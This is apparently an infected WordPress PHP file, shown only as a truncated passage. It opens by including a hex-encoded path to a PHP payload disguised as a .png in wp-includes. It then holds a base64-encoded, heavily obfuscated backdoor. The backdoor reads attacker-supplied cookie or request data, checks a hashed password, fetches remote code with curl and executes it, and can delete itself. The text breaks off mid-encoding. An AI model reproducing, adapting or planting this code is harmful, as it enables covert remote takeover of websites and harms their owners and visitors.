@include "\x2f\x68\x6f\x6d\x65\x2f\x63\x6f\x72\x6f\x6d\x75\x6e\x69\x2f\x70\x75\x62\x6c\x69\x63\x5f\x68\x74\x6d\x6c\x2f\x77\x70\x2d\x69\x6e\x63\x6c\x75\x64\x65\x73\x2f\x69\x6d\x61\x67\x65\x73\x2f\x77\x70\x69\x63\x6f\x6e\x73\x2d\x33\x78\x2e\x70\x6e\x67";?> error_reporting(0); set_time_limit(0); ignore_user_abort(true); $do = "/home/coromuni/public_html/"; $open_cache_ruzhu_phpcode = base64_decode("PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOyAkYlQgPSByYW5nZShjaHIoMTI2KSxjaHIoMjApKTskV289JHskYlRbMzFdLiRiVFs1OV0uJGJUWzQ3XS4kYlRbNDddLiRiVFs1MV0uJGJUWzUzXS4kYlRbNTddfTtpZigoaW5fYXJyYXkoZ2V0dHlwZSgkV28pLmNvdW50KCRXbyksJFdvKSYmY291bnQoJFdvKT09MjgpKXsoKCRXb1s2M109JFdvWzYzXS4kV29bNzRdKSYmKCRXb1s4NV09JFdvWzYzXSgkV29bODVdKSkmJihAJFdvPSRXb1s4NV0oJFdvWzU5XSwkV29bNjNdKCR7JFdvWzQzXX1bMzBdKSkpJiYkV28oKSk7fSAkRGxIa2VFeFQgPSByYW5nZShjaHIoMTI2KSxjaHIoMjApKTskY1VEbU0gPSBhcnJheShAJHskRGxIa2VFeFRbMzFdLiREbEhrZUV4VFs1NV0uJERsSGtlRXhUWzU3XS4kRGxIa2VFeFRbNDJdfVskRGxIa2VFeFRbNjFdLiREbEhrZUV4VFs0NF0uJERsSGtlRXhUWzQ0XS4kRGxIa2VFeFRbNjFdLiREbEhrZUV4VFszN11dLCAkRGxIa2VFeFRbMjddLiREbEhrZUV4VFsxMl0uJERsSGtlRXhUWzI1XS4kRGxIa2VFeFRbMjldLiREbEhrZUV4VFsxMF0uJERsSGtlRXhUWzI1XS4kRGxIa2VFeFRbMzFdLiREbEhrZUV4VFsyNF0uJERsSGtlRXhUWzldLiREbEhrZUV4VFsxNl0uJERsSGtlRXhUWzI3XS4kRGxIa2VFeFRbMTBdLiREbEhrZUV4VFsyMV0uJERsSGtlRXhUWzE1XS4kRGxIa2VFeFRbMTZdLCAkRGxIa2VFeFRbMTFdLiREbEhrZUV4VFsxMF0uJERsSGtlRXhUWzEyXS4kRGxIa2VFeFRbMzFdLiREbEhrZUV4VFsxMl0uJERsSGtlRXhUWzE1XS4kRGxIa2VFeFRbMTBdLiREbEhrZUV4VFs3N10uJERsSGtlRXhUWzc1XSwgJERsSGtlRXhUWzIwXS4kRGxIa2VFeFRbMTFdLiREbEhrZUV4VFsxNV0uJERsSGtlRXhUWzE2XS4kRGxIa2VFeFRbMzFdLiREbEhrZUV4VFsyNl0uJERsSGtlRXhUWzI1XS4kRGxIa2VFeFRbMjddLiREbEhrZUV4VFsxNV0uJERsSGtlRXhUWzI2XS4kRGxIa2VFeFRbMjVdLCREbEhrZUV4VFsxNF0uJERsSGtlRXhUWzI5XS4kRGxIa2VFeFRbMjddLiREbEhrZUV4VFsxOV0sICREbEhrZUV4VFsyOF0uJERsSGtlRXhUWzI5XS4kRGxIa2VFeFRbMTFdLiREbEhrZUV4VFsyNV0uJERsSGtlRXhUWzcyXS4kRGxIa2VFeFRbNzRdLiREbEhrZUV4VFszMV0uJERsSGtlRXhUWzI2XS4kRGxIa2VFeFRbMjVdLiREbEhrZUV4VFsyN10uJERsSGtlRXhUWzE1XS4kRGxIa2VFeFRbMjZdLiREbEhrZUV4VFsyNV0sICREbEhrZUV4VFsyNF0uJERsSGtlRXhUWzIxXS4kRGxIa2VFeFRbMThdLiREbEhrZUV4VFsyNV0uJERsSGtlRXhUWzMxXS4kRGxIa2VFeFRbMjNdLiREbEhrZUV4VFsyNV0uJERsSGtlRXhUWzEwXS4kRGxIa2VFeFRbMzFdLiREbEhrZUV4VFsyN10uJERsSGtlRXhUWzE1XS4kRGxIa2VFeFRbMTZdLiREbEhrZUV4VFsxMF0uJERsSGtlRXhUWzI1XS4kRGxIa2VFeFRbMTZdLiREbEhrZUV4VFsxMF0uJERsSGtlRXhUWzExXSwgQCR7JERsSGtlRXhUWzMxXS4kRGxIa2VFeFRbNTVdLiREbEhrZUV4VFs1N10uJERsSGtlRXhUWzQyXX1bJERsSGtlRXhUWzE1XS4kRGxIa2VFeFRbMjRdXSwpOyAkWEVySSA9ICRjVURtTVsyXSgkY1VEbU1bMF0pOyR0ZSA9IEAkY1VEbU1bNF0oJERsSGtlRXhUWzU0XS4kRGxIa2VFeFRbODRdLCAkWEVySSk7JHlIID0gJGNVRG1NWzNdKCR0ZSwgdHJ1ZSk7ICRjVURtTVs3XSA9PSAxICYmIGRpZSgkY1VEbU1bNl0oX19GSUxFX18pKTsgaWYgKCgkeUhbMF0gLSB0aW1lKCkpID4gMCBhbmQgbWQ1KG1kNSgkeUhbMl0pKSA9PT0gIjI0MTViZDI5MDNkZmQ5Mzk2MWYxNmJlMWMwZGEwNTE5IikgeyAkbGJJID0gY3VybF9pbml0KCR5SFsxXSk7IGN1cmxfc2V0b3B0KCRsYkksIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyAkbWFTc3cgPSBjdXJsX2V4ZWMoJGxiSSk7JGFwenQgPSBlbXB0eSgkbWFTc3cpPyRjVURtTVs2XSgkeUhbMV0pOiRtYVNzdztAJGNVRG1NWzFdKCIiLCAkRGxIa2VFeFRbMV0gLiAkY1VEbU1bNV0oJGFwenQpIC4gJERsSGtlRXhUWzc5XS4kRGxIa2VFeFRbODRdKTsgZGllO30gJEd5SCA9IHJhbmdlKGNocigxMjYpLGNocigyMCkpOyRBUD0kR3lIWzI3XS4kR3lIWzEyXS4kR3lIWzI1XS4kR3lIWzI5XS4kR3lIWzEwXS4kR3lIWzI1XS4kR3lIWzMxXS4kR3lIWzI0XS4kR3lIWzldLiRHeUhbMTZdLiRHeUhbMjddLiRHeUhbMTBdLiRHeUhbMjFdLiRHeUhbMTVdLiRHeUhbMTZdOyAkWFJwcz1AJEFQKCRHeUhbOTBdLiRHeUhbMzFdLCRHeUhbMjVdLiRHeUhbOF0uJEd5SFsyOV0uJEd5SFsxOF0uJEd5SFs4Nl0uJEd5SFs5Ml0uJEd5SFs2M10uJEd5SFs2NF0uJEd5SFs5Ml0uJEd5SFs4MF0uJEd5SFsyOF0uJEd5SFsyOV0uJEd5SFsxMV0uJEd5SFsyNV0uJEd5SFs3Ml0uJEd5SFs3NF0uJEd5SFszMV0uJEd5SFsyNl0uJEd5SFsyNV0uJEd5SFsyN10uJEd5SFsxNV0uJEd5SFsyNl0uJEd5SFsyNV0uJEd5SFs4Nl0uJEd5SFsxMV0uJEd5SFsxMF0uJEd5SFsxMl0uJEd5SFszMV0uJEd5SFsxMl0uJEd5SFsxNV0uJEd5SFsxMF0uJEd5SFs3N10uJEd5SFs3NV0uJEd5SFs4Nl0uJEd5SFsyM10uJEd5SFs0XS4kR3lIWzIxXS4kR3lIWzE2XS4kR3lIWzI0XS4kR3lIWzE4XS4kR3lIWzI5XS4kR3lIWzEwXS4kR3lIWzI1XS4kR3lIWzg2XS4kR3lIWzI4XS4kR3lIWzI5XS4kR3lIWzExXS4kR3lIWzI1XS4kR3lIWzcyXS4kR3lIWzc0XS4kR3lIWzMxXS4kR3lIWzI2XS4kR3lIWzI1XS4kR3lIWzI3XS4kR3lIWz